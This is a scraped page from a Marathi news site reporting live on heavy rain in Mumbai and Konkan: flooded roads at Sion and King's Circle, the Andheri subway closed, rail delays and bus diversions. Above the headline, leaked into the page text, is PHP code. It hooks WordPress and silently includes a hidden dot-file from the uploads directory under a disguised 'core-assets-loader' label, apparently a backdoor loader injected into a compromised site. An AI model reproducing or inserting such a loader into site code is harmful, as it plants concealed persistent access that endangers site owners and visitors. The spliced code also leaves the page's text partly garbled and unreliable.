add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Maharashtra Rain Live Updates : मुंबईत सायन, किंगसर्कलमध्ये साचलं पाणी, अंधेरी सबवे वाहतुकीसाठी बंद – SOCH INDIA
Menu

देश
Maharashtra Rain Live Updates : मुंबईत सायन, किंगसर्कलमध्ये साचलं पाणी, अंधेरी सबवे वाहतुकीसाठी बंद

nobanner

मुंबईसह कोकण विभागात गुरुवारी दुपारी 12 वाजल्यापासून मुसळधार पावसाची सुरुवात झाली. सकाळच्या वेळी शहरात पावसानं उसंत घेतल्यामुळं नोकरीसाठी अनेकजण घराबाहेर पडले. पण, त्यानंतर मात्र काळ्या ढगांची चादर शहराला झाकोळून गेली आणि पुन्हा एकदा शहरात पावसाला सुरुवात झाली. तिथं कोकणातही अशीच काहीशी परिस्थिती निर्माण झाल्याचं पाहायला मिळालं. राज्यात काही ठिकाणी पावसाचा वाढणारा जोर पाहता वाहतुकीचे मार्ग बदण्यात आले असून, मुंबई लोकल वाहतूकही 10 ते 15 मिनिटं उशिरानं सुरु आहे.

अंधेरी सब-वेमधील पाणी ओसरण्यास सुरुवात झाली आहे. येथील वाहतूक पुन्हा हळूहळू सुरु झाली असून पूर्वपदावर येत आहे.

वसई विरारमध्ये गेल्या 72 तासांपासून दमदार पाऊस बसरतोय. पावसामुळे शहरी भागासह ग्रामीण भाग पूर्णपणे पाण्याखाली गेलाय. 72 तास उलटले मात्र तरीही पाण्याचा निचरा झालेला नाही. यामुळे नागरिकांना पाण्यातूनच आपली वाट काढत जाव लागतंय. विरार पश्चिमेच्या आगाशी-बोळींज रस्ता, विवा कॉलेज परिसर, म्हाडा वसाहत तर नालासोपा-यातील सेंट्रल पार्कसह अनेक भागात पावसामुळे जनजीवन विस्कळीत झालंय.

मुसळधार पावसामुळे मध्य रेल्वेची वाहतूक विस्कळीत. कांजूर मार्ग आणि विक्रोळी दरम्यान ट्रॅकवर पाणी ट्रॅकवर पाणी साचल्यानं लोकल वाहतुकीवर परिणाम मुंबईला मुसळधार पावसानं झोडपलं. बईमध्ये हळूहळू पावसाचा जोर वाढतोय… त्यामुळे पाणी साचायला सुरुवात झालीय. सायन, किंगसर्कलमध्ये मोठ्या प्रमाणावर पाणी साठलंय. सगळ्या वाहनांना पाण्यातून वाट काढत प्रवास करावा लागतोय. मुंबईत मुसळधार पावसामुळे अंधेरी सबवे बंद करण्यात आलाय. अंधेरी सबवेमध्ये पाणी साचल्यानं वाहतुकीसाठी सबवे बंद करण्यात आला. मरीन ड्राईव्हवर उंचच उंच लाटा उसळतायत…. दुपारी अडीचच्या सुमाराला भरती असल्यानं मोठमोठ्या लाटा उसळल्या.

सायन रोड नं.24 येथे पावसाचे पाणी भरल्याने सायन सर्कल ते सायन स्टेशन सिग्नल दरम्यान नियोजित मार्ग बंद करुन राणी लक्ष्मीबाई चौक, रोड नं.3 मार्गे बसमार्ग 7,22,25,167,302,212,341,411,463 च्या बसगाड्या वेळ 13.35 पासुन परावर्तित करण्यात आलेल्या आहेत.